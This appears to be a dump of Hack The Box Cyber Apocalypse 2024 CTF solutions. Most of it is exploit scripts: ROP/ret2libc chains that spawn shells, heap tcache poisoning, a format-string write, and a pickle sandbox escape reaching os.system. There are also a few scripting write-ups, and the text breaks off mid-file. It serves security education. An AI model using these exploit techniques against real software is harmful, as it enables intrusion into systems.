Quantum Conundrum/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/misc/[Medium] Quantum Conundrum/assets/image.png -------------------------------------------------------------------------------- /misc/[Medium] Quantum Conundrum/htb/solver.py: -------------------------------------------------------------------------------- 1 | import telnetlib 2 | 3 | input = """ 4 | {"type": "hadamard","register_indexes": [1]};{"type": "cnot","register_indexes": [1,2]};{"type": "cnot","register_indexes": [0, 1]};{"type": "hadamard","register_indexes": [0]} 5 | """ 6 | HOST = "127.0.0.1" 7 | PORT = 1337 8 | 9 | tn = telnetlib.Telnet(HOST, PORT) 10 | 11 | print(" > Connected succesfully to server...") 12 | tn.read_until(b"\n>") 13 | print(" > Read garbage...") 14 | tn.write(input.encode()) 15 | print(f" > Sent input: {input}") 16 | tn.read_until((b"\n % Testing quantum circuit, please wait...\n")) 17 | print(" > Read some more garbage...") 18 | flag = tn.read_all() 19 | print(f"> Got flag: {flag.decode()}") -------------------------------------------------------------------------------- /misc/[Medium] Were Pickle Phreaks Revenge/htb/sol.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode, b64decode 2 | from pickora import Compiler 3 | from pwn import * 4 | 5 | def send_payload(payload): 6 | payload = b64encode(compiler.compile(payload)) 7 | io.recvuntil(b'> ') 8 | io.sendline(b'2') 9 | io.recvuntil(b': ') 10 | io.sendline(payload) 11 | 12 | def get_flag(): 13 | io.recvuntil(b'> ') 14 | io.sendline(b'1') 15 | io.interactive() 16 | io.recvuntil(b'HTB{') 17 | flag = io.recvuntil(b'}') 18 | return b'HTB{' + flag 19 | 20 | def pwn(): 21 | payload = b'_setattr = GLOBAL("app", "__setattr__");' 22 | payload += b'subclasses = GLOBAL("app", "members.__class__.__base__.__subclasses__")();' 23 | payload += b'_setattr("subclasses", subclasses);' 24 | payload += b'gadget = GLOBAL("app", "subclasses.__getitem__")(133);' 25 | payload += b'_setattr("gadget", gadget);' 26 | payload += b'builtins = GLOBAL("app", "gadget.__init__.__globals__.__getitem__")("__builtins__");' 27 | payload += b'_setattr("builtins", builtins);' 28 | payload += b'eval = GLOBAL("app", "builtins.__getitem__")("eval");' 29 | payload += b'eval(\'__import__("os").system("cat flag.txt")\')' 30 | send_payload(payload) 31 | flag = get_flag() 32 | print(flag) 33 | 34 | if __name__ == '__main__': 35 | ip = '127.0.0.1' 36 | port = 1337 37 | io = remote(ip, port) 38 | #io = process(['python', 'app.py']) 39 | compiler = Compiler() 40 | pwn() 41 | -------------------------------------------------------------------------------- /misc/[Very Easy] Character/README.md: -------------------------------------------------------------------------------- 1 | ![](../../../../../assets/banner.png) 2 | 3 | Character 4 | 5 | ​ 8th March 2024 6 | 7 | ​ Challenge Author: ir0nstone 8 | 9 | 10 | 11 | 12 | 13 | # Synopsis 14 | 15 | Character is a Very Easy misc coding challenge where the remote server prompts you repeatedly for an index of the flag, and when you enter an index it will return the character at that index. 16 | 17 | ## Description 18 | 19 | Security through Induced Boredom is a personal favourite approach of mine. Not as exciting as something like The Fray, but I love making it as tedious as possible to see my secrets, so you can only get one character at a time! 20 | 21 | ## Skills Required 22 | - Basic programming skills 23 | 24 | ## Skills Learned 25 | - Scripting remote connections 26 | 27 | # Enumeration 28 | 29 | Connecting to the server gives us this prompt: 30 | 31 | ```sh 32 | $ nc 33 | Which character of the flag do you want? Enter an index: 34 | ``` 35 | 36 | If we input `0`, `1`, etc consecutively, we can see what's happening: 37 | 38 | ``` 39 | Which character of the flag do you want? Enter an index: 0 40 | Character at Index 0: H 41 | Which character of the flag do you want? Enter an index: 1 42 | Character at Index 1: T 43 | Which character of the flag do you want? Enter an index: 2 44 | Character at Index 2: B 45 | ``` 46 | 47 | The first three characters are `HTB`. This is clearly leaking the flag! 48 | 49 | # Solution 50 | 51 | To solve the challenge, we simply have to start at index `0` and increment it, querying the server for every index. We can script this using pwntools. First start a connection: 52 | 53 | ```python 54 | from pwn import * 55 | 56 | p = remote('', ) 57 | ``` 58 | 59 | Then we want to create an empty `flag` string to add onto, and an index counter `idx` that starts at `0`: 60 | 61 | ```python 62 | flag = '' 63 | idx = 0 64 | ``` 65 | 66 | Now we'll start an infinite loop, incrementing the index we ask for by `1` every time to grab every index. If the character we get is `}`, we know we've reached the end of the flag. 67 | 68 | ```python 69 | while True: 70 | p.sendlineafter(b'index: ', str(idx).encode()) 71 | p.recvuntil(b': ') 72 | char = p.recvS(1) 73 | 74 | flag += char 75 | idx += 1 76 | 77 | if char == '}': 78 | break 79 | 80 | print(flag) 81 | ``` 82 | 83 | We get the flag! -------------------------------------------------------------------------------- /misc/[Very Easy] Character/htb/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = remote('127.0.0.1', 1337) 4 | 5 | flag = '' 6 | idx = 0 7 | while True: 8 | p.sendlineafter(b'index: ', str(idx).encode()) 9 | p.recvuntil(b': ') 10 | char = p.recvS(1) 11 | 12 | flag += char 13 | idx += 1 14 | 15 | if char == '}': 16 | break 17 | 18 | print(flag) 19 | -------------------------------------------------------------------------------- /misc/[Very Easy] Stop Drop and Roll/README.md: -------------------------------------------------------------------------------- 1 | ![](../../../../../assets/banner.png) 2 | 3 | Stop Drop and Roll 4 | 5 | ​ 8th March 2024 6 | 7 | ​ Challenge Author: ir0nstone 8 | 9 | 10 | 11 | 12 | 13 | # Synopsis 14 | 15 | Stop Drop and Roll is a Very Easy misc coding challenge where the remote server sends you scenarios and you must script a response to them. 16 | 17 | ## Description 18 | 19 | The Fray: The Video Game is one of the greatest hits of the last... well, we don't remember quite how long. Our "computers" these days can't run much more than that, and it has a tendency to get repetitive... 20 | 21 | ## Skills Required 22 | - Basic programming skills 23 | 24 | ## Skills Learned 25 | - Scripting remote connections 26 | 27 | # Enumeration 28 | 29 | Connecting to the server gives us this prompt: 30 | 31 | ``` 32 | $ nc localhost 1337 33 | ===== THE FRAY: THE VIDEO GAME ===== 34 | Welcome! 35 | This video game is very simple 36 | You are a competitor in The Fray, running the GAUNTLET 37 | I will give you one of three scenarios: GORGE, PHREAK or FIRE 38 | You have to tell me if I need to STOP, DROP or ROLL 39 | If I tell you there's a GORGE, you send back STOP 40 | If I tell you there's a PHREAK, you send back DROP 41 | If I tell you there's a FIRE, you send back ROLL 42 | Sometimes, I will send back more than one! Like this: 43 | GORGE, FIRE, PHREAK 44 | In this case, you need to send back STOP-ROLL-DROP! 45 | Are you ready? (y/n) 46 | ``` 47 | 48 | The instructions are pretty clear - we have to take in a list of `GORGE`, `PHREAK` and `FIRE` prompts and return the instructions `STOP`, `DROP` or `ROLL` depending on the prompt. 49 | 50 | # Solution 51 | 52 | We will script this challenge using pwntools. First start a connection: 53 | 54 | ```python 55 | from pwn import * 56 | 57 | p = remote('', ) 58 | ``` 59 | 60 | Then we want to send `y` to start the game and receive the response. 61 | 62 | ```python 63 | p.sendlineafter(b'(y/n) ', b'y') 64 | p.recvline() 65 | ``` 66 | 67 | Now we'll start an infinite loop, taking in a line of input. We then want to replace every `, ` with `-`, every `GORGE` with `STOP`, every `PHREAK` with `DROP` and every `FIRE` with `ROLL`. After this, we send it back. 68 | 69 | If the line we receive has no `GORGE`, `PHREAK` or `FIRE`, it's probably returned the flag to us, so we just print out the line and quit the loop. 70 | 71 | ```python 72 | while True: 73 | recv = p.recvlineS().strip() 74 | 75 | if 'GORGE' not in recv and 'PHREAK' not in recv and 'FIRE' not in recv: 76 | print(recv) 77 | break 78 | 79 | result = recv.replace(", ", "-") 80 | result = result.replace("GORGE", "STOP") 81 | result = result.replace("PHREAK", "DROP") 82 | result = result.replace("FIRE", "ROLL") 83 | 84 | p.sendlineafter(b'do? ', result.encode()) 85 | ``` 86 | 87 | Running this against the server, we get the flag! -------------------------------------------------------------------------------- /misc/[Very Easy] Stop Drop and Roll/htb/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | p = remote('127.0.0.1', 1337) 4 | 5 | p.sendlineafter(b'(y/n) ', b'y') 6 | p.recvline() 7 | 8 | while True: 9 | recv = p.recvlineS().strip() 10 | 11 | if 'GORGE' not in recv and 'PHREAK' not in recv and 'FIRE' not in recv: 12 | print(recv) 13 | break 14 | 15 | result = recv.replace(", ", "-") 16 | result = result.replace("GORGE", "STOP") 17 | result = result.replace("PHREAK", "DROP") 18 | result = result.replace("FIRE", "ROLL") 19 | 20 | p.sendlineafter(b'do? ', result.encode()) 21 | -------------------------------------------------------------------------------- /pwn/[Easy] Pet companion/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Pet companion/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Easy] Pet companion/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Pet companion/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Easy] Pet companion/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | fname = './pet_companion' 10 | 11 | LOCAL = False 12 | 13 | os.system('clear') 14 | 15 | if LOCAL: 16 | print('Running solver locally..\n') 17 | r = process(fname) 18 | else: 19 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 20 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 21 | r = remote(IP, PORT) 22 | print(f'Running solver remotely at {IP}:{PORT}\n') 23 | 24 | e = ELF(fname) 25 | libc = ELF(e.runpath.decode() + 'libc.so.6') 26 | 27 | ''' 28 | Gadget 1: 29 | 0x000000000040073a <+90>: pop rbx 30 | 0x000000000040073b <+91>: pop rbp 31 | 0x000000000040073c <+92>: pop r12 32 | 0x000000000040073e <+94>: pop r13 33 | 0x0000000000400740 <+96>: pop r14 34 | 0x0000000000400742 <+98>: pop r15 35 | 0x0000000000400744 <+100>: ret 36 | 37 | Gadget 2: 38 | 0x0000000000400720 <+64>: mov rdx,r15 39 | 0x0000000000400723 <+67>: mov rsi,r14 40 | 0x0000000000400726 <+70>: mov edi,r13d 41 | 0x0000000000400729 <+73>: call QWORD PTR [r12+rbx*8] 42 | ''' 43 | 44 | # ret2csu to leak libc address 45 | r.sendline(flat({ 46 | 0x48: p64(e.sym.__libc_csu_init + 90) + 47 | p64(0) + p64(1) + p64(e.got.write) + 48 | p64(1) + p64(e.got.write) + p64(8) + 49 | p64(e.sym.__libc_csu_init + 64) + 50 | p64(0) * 7 + p64(e.sym.main) 51 | })) 52 | 53 | # Calculate libc base 54 | libc.address = u64(r.recvline_contains('\x7f')) - libc.sym.write 55 | print(f'Libc base: {libc.address:#04x}') 56 | 57 | # ret2libc 58 | rop = ROP(libc, base=libc.address) 59 | rop.call(rop.ret[0]) 60 | rop.system(next(libc.search(b'/bin/sh\x00'))) 61 | r.sendline(flat({0x48: rop.chain()})) 62 | 63 | # Get flag 64 | pause(1) 65 | r.sendline('cat flag*') 66 | print(f'\nFlag --> {r.recvline_contains(b"HTB").strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Easy] Rocket Blaster XXX/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Rocket Blaster XXX/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Easy] Rocket Blaster XXX/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Rocket Blaster XXX/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Easy] Rocket Blaster XXX/assets/inter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Easy] Rocket Blaster XXX/assets/inter.png -------------------------------------------------------------------------------- /pwn/[Easy] Rocket Blaster XXX/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | fname = './rocket_blaster_xxx' 10 | 11 | LOCAL = False 12 | 13 | os.system('clear') 14 | 15 | if LOCAL: 16 | print('Running solver locally..\n') 17 | r = process(fname) 18 | else: 19 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 20 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 21 | r = remote(IP, PORT) 22 | print(f'Running solver remotely at {IP} {PORT}\n') 23 | 24 | r.timeout = 0.1 25 | 26 | e = ELF(fname) 27 | rop = ROP(e) 28 | 29 | payload = flat({ 30 | 0x28: p64(rop.find_gadget(['pop rdi'])[0]) + p64(0xdeadbeef) + 31 | p64(rop.find_gadget(['pop rsi'])[0]) + p64(0xdeadbabe) + 32 | p64(rop.find_gadget(['pop rdx'])[0]) + p64(0xdead1337) + 33 | p64(rop.find_gadget(['ret'])[0]) + p64(e.sym.fill_ammo) 34 | }) 35 | 36 | r.sendline(payload) 37 | 38 | r.recvuntil('at: ') 39 | print(f'Flag --> {r.recvline().strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Hard] Maze of Mist/assets/symlink.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Hard] Maze of Mist/assets/symlink.png -------------------------------------------------------------------------------- /pwn/[Hard] Maze of Mist/htb/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.binary = './target' 4 | 5 | VDSO_BASE_ADDR = 0xf7ffc000 6 | 7 | MOV_EAX_ECX_PLUS_EBP_M20 = VDSO_BASE_ADDR + 0x67c 8 | POP_EBP = VDSO_BASE_ADDR + 0x0000613 9 | POP_EDX_ECX = VDSO_BASE_ADDR + 0x0000057a 10 | SYSCALL_POP_EBP_EDX_ECX = VDSO_BASE_ADDR + 0x00000577 11 | BINSH = 0xffffdf20 12 | ARGV = BINSH + 8 13 | 14 | payload = flat( 15 | b'A'*0x20, 16 | 17 | POP_EBP, 18 | 0x8048028, 19 | 20 | POP_EDX_ECX, 21 | 0, 22 | 23, 23 | 24 | MOV_EAX_ECX_PLUS_EBP_M20, 25 | b'A'*44, 26 | 0, 27 | b'A'*12, 28 | SYSCALL_POP_EBP_EDX_ECX, 29 | 0x8048028, 30 | 0, 11, 31 | MOV_EAX_ECX_PLUS_EBP_M20, 32 | b'A'*44, 33 | BINSH, 34 | b'A'*12, 35 | 36 | POP_EDX_ECX, 37 | 0, 38 | ARGV, 39 | 40 | SYSCALL_POP_EBP_EDX_ECX, 41 | b'/bin/sh\x00', 42 | BINSH+5, 43 | 0 44 | ) 45 | 46 | print(payload) 47 | -------------------------------------------------------------------------------- /pwn/[Hard] Oracle/htb/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from pwn import * 3 | 4 | IP = args.HOST or "0" 5 | PORT = args.PORT or 9001 6 | 7 | context.binary = './challenge/oracle' 8 | libc = ELF('challenge/libc-2.31.so') 9 | 10 | # create chunks, including buffer chunk 11 | p = remote(IP, PORT) 12 | p.send(b'PLAGUE /huh HTTP/1.1\r\nContent-Length: 200\r\nPlague-Target: test\r\n\r\nf') 13 | p.close() 14 | 15 | # libc leak 16 | p = remote(IP, PORT) 17 | p.send(b'PLAGUE /huh HTTP/1.1\r\nContent-Length: 200\r\nPlague-Target: test\r\n\r\nf') 18 | 19 | p.recvuntil(b'plague: ') 20 | p.recv(8) # may as well ignore corrupted pointer and take the second 21 | leak = u64(p.recv(8)) 22 | log.success(f'Leak: 0x{leak:x}') 23 | 24 | libc.address = leak - 0x1ecbe0 25 | log.success(f'Libc base: 0x{libc.address:x}') 26 | 27 | p.close() 28 | 29 | # buffer overflow 30 | rop = ROP(libc) 31 | 32 | rop.dup2(6, 0) 33 | rop.dup2(6, 1) 34 | rop.raw(libc.address + 0x22679) 35 | rop.system(next(libc.search(b'/bin/sh\x00'))) 36 | 37 | print(rop.dump()) 38 | 39 | p = remote(IP, PORT) 40 | 41 | 42 | payload = b'PLAGUE /huh HTTP/1.1\r\n' 43 | payload = payload.ljust(1024, b'A') 44 | payload += b'\n' * 0x4e 45 | payload += rop.chain() 46 | payload += b'\r\n\r\nf\r\n' 47 | 48 | p.send(payload) 49 | p.interactive() 50 | -------------------------------------------------------------------------------- /pwn/[Insane] Gloater/assets/initial_run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Insane] Gloater/assets/initial_run.png -------------------------------------------------------------------------------- /pwn/[Insane] Gloater/htb/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | elf = context.binary = ELF('./challenge/gloater') 4 | libc = ELF('./libc-2.31.so') 5 | p = remote('127.0.0.1', 9001) 6 | 7 | def change_user(name): 8 | p.sendlineafter(b'> ', b'1') 9 | p.sendafter(b'New User: ', name) 10 | p.recvuntil(b'Old User was ') 11 | return p.recvuntil(b'...', drop=True) 12 | 13 | def create_taunt(target, description): 14 | p.sendlineafter(b'> ', b'2') 15 | p.sendlineafter(b'target: ', target) 16 | p.sendlineafter(b'Taunt: ', description) 17 | 18 | def remove_taunt(idx): 19 | p.sendlineafter(b'> ', b'3') 20 | p.sendlineafter(b'Index: ', str(idx).encode()) 21 | 22 | def set_super_taunt(idx, description): 23 | p.sendlineafter(b'> ', b'5') 24 | p.sendlineafter(b'Taunt: ', str(idx).encode()) 25 | p.sendlineafter(b'taunt: ', description) 26 | 27 | 28 | # send... 29 | p.sendlineafter(b'> ', b'A' * 0x10) # send name 16 bytes 30 | create_taunt(b'yes', b'no') # create a taunt 31 | set_super_taunt(0, b'A'*0x88) # set the super taunt 32 | 33 | p.recvuntil(b'A'*0x88) 34 | leak = u64(p.recv(6) + b'\0\0') 35 | libc.address = leak - libc.sym['puts'] 36 | log.success(f'LIBC Base: 0x{libc.address:x}') 37 | 38 | # libc addr means squat 39 | # because the pointer is never used to edit, just free 40 | # and free is checked 41 | # and tf are you gonna do by freeing an address in libc? 42 | # ohhh actually you could free something? but nah, fully doubt, especially with only 1 name change 43 | 44 | payload = b'A' * 4 45 | payload += b'\x10\x10' # brute 4th-last bit as a `1` 46 | leak = change_user(payload) 47 | leak = leak.split(b'A' * 0x10)[1] 48 | leak += b'\0' * 2 49 | leak = u64(leak) 50 | log.success(f'Leak: 0x{leak:x}') 51 | 52 | # array located at base + 0x40e0 53 | pause() 54 | 55 | # ... now free tcache 56 | remove_taunt(0) 57 | 58 | # fake tcache! 59 | # tcache is size 0x290 60 | # so we need to input 0x280 data 61 | ret_addr = leak - 0x18 62 | log.info(f'Writing to 0x{ret_addr:x}') 63 | 64 | tcache_fake = p16(0) * 12 # pad it out... 65 | tcache_fake += p16(1) # 0xe0 bin... 66 | tcache_fake += p16(0) * (64-12-1) # rest of bins 67 | tcache_fake += p64(0) * 12 # get to nice size 68 | tcache_fake += p64(ret_addr) # overwrite 0xe0 bin...! 69 | tcache_fake = tcache_fake.ljust(0x280-1, b'\x00') # -1 for newline... 70 | 71 | create_taunt(b'dontcare', tcache_fake) # works! 72 | 73 | # now to use arb write? 74 | # have to use the 0xe0 bin! 75 | rop = ROP(libc) 76 | 77 | rop.raw(libc.address + 0x22679) 78 | rop.system(next(libc.search(b'/bin/sh\0'))) 79 | 80 | payload = rop.chain() 81 | payload = payload.ljust(0xd0, b'A') 82 | 83 | p.sendlineafter(b'> ', b'2') 84 | p.sendlineafter(b'target: ', b'nomatter') 85 | pause() 86 | p.sendlineafter(b'Taunt: ', payload) 87 | 88 | p.interactive() 89 | -------------------------------------------------------------------------------- /pwn/[Medium] Death Note/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Death Note/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Medium] Death Note/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Death Note/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Medium] Death Note/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | prompt = '💀'.encode('utf-8') 10 | 11 | fname = './deathnote' 12 | 13 | LOCAL = False 14 | 15 | os.system('clear') 16 | 17 | if LOCAL: 18 | print('Running solver locally..\n') 19 | r = process(fname) 20 | else: 21 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 22 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 23 | r = remote(IP, PORT) 24 | print(f'Running solver remotely at {IP} {PORT}\n') 25 | 26 | r.timeout = 0.5 27 | 28 | e = ELF(fname) 29 | libc = ELF(e.runpath.decode() + 'libc.so.6') 30 | 31 | rl = lambda : r.recvline() 32 | ru = lambda x : r.recvuntil(x) 33 | sla = lambda x,y : r.sendlineafter(x,y) 34 | slap = lambda y : r.sendlineafter(prompt,y) 35 | 36 | def malloc(sz, idx, payload): 37 | slap('1') 38 | slap(str(sz)) 39 | slap(str(idx)) 40 | slap(payload) 41 | 42 | def free(idx): 43 | slap('2') 44 | slap(str(idx)) 45 | 46 | def show(idx): 47 | slap('3') 48 | slap(str(idx)) 49 | 50 | [malloc(0x80, i, 'w3t') for i in range (9)] 51 | 52 | [free(i) for i in range (8)] 53 | 54 | show(7) 55 | 56 | ru('content: ') 57 | 58 | libc.address = u64(rl().strip().ljust(8, b'\x00')) - 0x21ace0 59 | 60 | print(f'Libc base: {libc.address:#04x}\n') 61 | 62 | # Create 2 notes: note[0] = system(), note[1] = "/bin/sh" 63 | malloc(0x20, 0, str(hex(libc.sym.system))) 64 | malloc(0x80, 1, b'/bin/sh\0') 65 | 66 | slap('42') 67 | 68 | r.sendline('') 69 | 70 | pause(1) 71 | r.sendline('cat flag*') 72 | print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Medium] Sound of Silence/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Sound of Silence/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Medium] Sound of Silence/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Medium] Sound of Silence/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Medium] Sound of Silence/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | fname = './sound_of_silence' 10 | 11 | LOCAL = False 12 | 13 | os.system('clear') 14 | 15 | if LOCAL: 16 | print('Running solver locally..\n') 17 | r = process(fname) 18 | else: 19 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 20 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 21 | r = remote(IP, PORT) 22 | print(f'Running solver remotely at {IP} {PORT}\n') 23 | 24 | e = ELF(fname) 25 | 26 | payload = flat({0x28: p64(e.plt.gets) + p64(e.plt.system)}) 27 | 28 | r.sendlineafter('>> ', payload) 29 | 30 | r.sendline('cat glag*') 31 | 32 | print(f'Flag --> {r.recvline_contains(b"HTB").strip().decode()}\n') 33 | -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Delulu/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Delulu/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/assets/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Delulu/assets/interface.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Delulu/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.arch = 'amd64' 7 | context.log_level = 'critical' 8 | 9 | LOCAL = False 10 | 11 | os.system('clear') 12 | 13 | if LOCAL: 14 | print('Running solver locally..\n') 15 | r = process('./delulu') 16 | else: 17 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 18 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 19 | r = remote(IP, PORT) 20 | print(f'Running solver remotely at {IP} {PORT}\n') 21 | 22 | 23 | def get_flag(): 24 | pause(1) 25 | r.sendline('cat flag*') 26 | print(f'\nFlag --> {r.recvline_contains(b"HTB").strip().decode()}\n') 27 | 28 | r.sendlineafter('>> ', '%48879x%7$hn') 29 | r.recvuntil('HTB') 30 | print(f'Flag --> HTB{r.recvline().strip().decode()}\n') -------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Tutorial/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Tutorial/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/assets/interface.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Tutorial/assets/interface.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Tutorial/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.log_level = 'critical' 7 | 8 | LOCAL = False 9 | 10 | os.system('clear') 11 | 12 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 13 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 14 | r = remote(IP, PORT) 15 | print(f'Running solver remotely at {IP} {PORT}\n') 16 | 17 | r.timeout = 0.5 18 | 19 | ans = ['y', '2147483647', '–2147483648', '-2147483648', '-2', 'int overflow', '-2147483648', '1337'] 20 | 21 | [r.sendlineafter('>> ', i) for i in ans] 22 | r.recvuntil('HTB') 23 | print(f'Flag --> HTB{r.recvline().strip().decode()}') -------------------------------------------------------------------------------- /pwn/[Very Easy] Writing on the wall/assets/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Writing on the wall/assets/banner.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Writing on the wall/assets/htb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackthebox/cyber-apocalypse-2024/4e59eec7a4919d2a4ae4f5d98ecf8ba153ac464a/pwn/[Very Easy] Writing on the wall/assets/htb.png -------------------------------------------------------------------------------- /pwn/[Very Easy] Writing on the wall/htb/solver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | from pwn import * 3 | import warnings 4 | import os 5 | warnings.filterwarnings('ignore') 6 | context.log_level = 'critical' 7 | 8 | LOCAL = False 9 | 10 | os.system('clear') 11 | 12 | if LOCAL: 13 | print('Running solver locally..\n') 14 | r = process('./writing_on_the_wall') 15 | else: 16 | IP = str(sys.argv[1]) if len(sys.argv) >= 2 else '0.0.0.0' 17 | PORT = int(sys.argv[2]) if len(sys.argv) >= 3 else 1337 18 | r = remote(IP, PORT) 19 | print(f'Running solver remotely at {IP} {PORT}\n') 20 | 21 | r.sendline(b'\x00' + b'A'* 5 + b'\x00') 22 | r.recvuntil(': ') 23 | print(f'Flag --> {r.recvline().strip().decode()}\n') -------------------------------------------------------------------------------- /reversing/[Easy] Crushing/htb/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from struct import unpack 4 | 5 | content = bytearray(1024) 6 | 7 | fp = open("message.txt.cz", "rb") 8 | highest = 0 9 | for current in range(256): 10 | length_bytes = fp.read(8) 11 | if 